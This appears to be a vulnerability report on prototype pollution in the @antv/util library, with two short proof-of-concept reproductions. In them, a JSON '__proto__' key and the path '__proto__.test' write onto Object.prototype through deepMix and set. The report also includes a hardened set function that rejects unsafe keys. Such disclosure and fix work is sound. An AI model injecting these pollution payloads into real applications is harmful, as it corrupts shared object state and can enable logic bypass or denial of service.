复现代码1:
// Reproduction 1: merging parsed JSON that carries a "__proto__" key.
let deepMix = require("@antv/util").deepMix;
// JSON.parse defines "__proto__" as an ordinary own, enumerable property
// (it does not set the prototype), so a key-by-key merge will visit it.
let BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');
let obj = {};
// The merge internals (_deepMix) are not shown on this page; the output below
// shows that the write ended up on Object.prototype rather than on `obj`.
deepMix(obj, BAD_JSON);
// A fresh, unrelated object literal now reports `test`.
console.log({}.test); // 123
问题代码:
/**
 * Merges every source in `args` into `rst`, left to right, and returns `rst`.
 *
 * Security note: this wrapper filters nothing itself; each source is handed to
 * `_deepMix`, whose body is not shown here. The reproduction reported with
 * this code shows that a source holding an own `__proto__` key (for example
 * the result of JSON.parse) ends up modifying Object.prototype, so the
 * `__proto__` / `constructor` / `prototype` key check presumably has to be
 * added inside `_deepMix` — confirm against its body.
 *
 * @param rst - merge target, passed to `_deepMix` for every source
 * @param args - source values, applied in argument order
 * @returns the same `rst` reference that was passed in
 */
const deepMix = function (rst: any, ...args: any[]) {
  for (const source of args) {
    _deepMix(rst, source);
  }

  return rst;
};
复现代码2:
// Reproduction 2: a dotted path whose first segment is "__proto__".
let set = require("@antv/util").set;
let obj = {};
// `set` splits the string on "." and walks the segments with plain property
// access, so obj["__proto__"] resolves to Object.prototype and `test` is
// assigned there instead of on `obj`.
set(obj, "__proto__.test", 123);
// Every object that inherits from Object.prototype now reports `test`.
console.log({}.test); // 123
问题代码:
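/**
 * Reports whether a path segment names a property through which a write can
 * reach a prototype object instead of the target itself.
 *
 * The segment is stringified first because property access coerces keys, so
 * a non-string segment that stringifies to one of these names is caught too.
 */
const isUnsafeKey = (key: unknown): boolean => {
  const name = String(key);
  return name === '__proto__' || name === 'constructor' || name === 'prototype';
};

/**
 * https://github.com/developit/dlv/blob/master/index.js
 *
 * Writes `value` at `path` inside `obj`, creating intermediate containers
 * where the existing value is not an object: an array when the next segment
 * is a number, a plain object otherwise.
 *
 * Hardening: without a key check, a path such as "__proto__.test" walks from
 * `obj` into Object.prototype and assigns there (prototype pollution). Any
 * path containing `__proto__`, `constructor` or `prototype` is therefore
 * rejected up front and `obj` is returned untouched.
 *
 * @param obj - object to mutate
 * @param path - dotted string ("a.b.c") or an array of segments
 * @param value - value assigned at the final segment
 * @returns the same `obj` reference
 */
export default (obj: any, path: string | any[], value: any): any => {
  const keyArr = isString(path) ? path.split('.') : path;

  // Validate the whole path before the first write so that a rejected path
  // leaves no half-created intermediate containers behind.
  for (let i = 0; i < keyArr.length; i += 1) {
    if (isUnsafeKey(keyArr[i])) {
      return obj;
    }
  }

  let o = obj;

  keyArr.forEach((key: string | number, idx: number) => {
    // not the last segment: descend, creating the container if needed
    if (idx < keyArr.length - 1) {
      if (!isObject(o[key])) {
        o[key] = isNumber(keyArr[idx + 1]) ? [] : {};
      }
      o = o[key];
    } else {
      // last segment: perform the assignment
      o[key] = value;
    }
  });

  return obj;
};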
复现代码1:
问题代码:
util/src/lodash/deep-mix.ts
Lines 42 to 47 in c499a30
复现代码2:
问题代码:
util/src/lodash/set.ts
Lines 5 to 29 in c499a30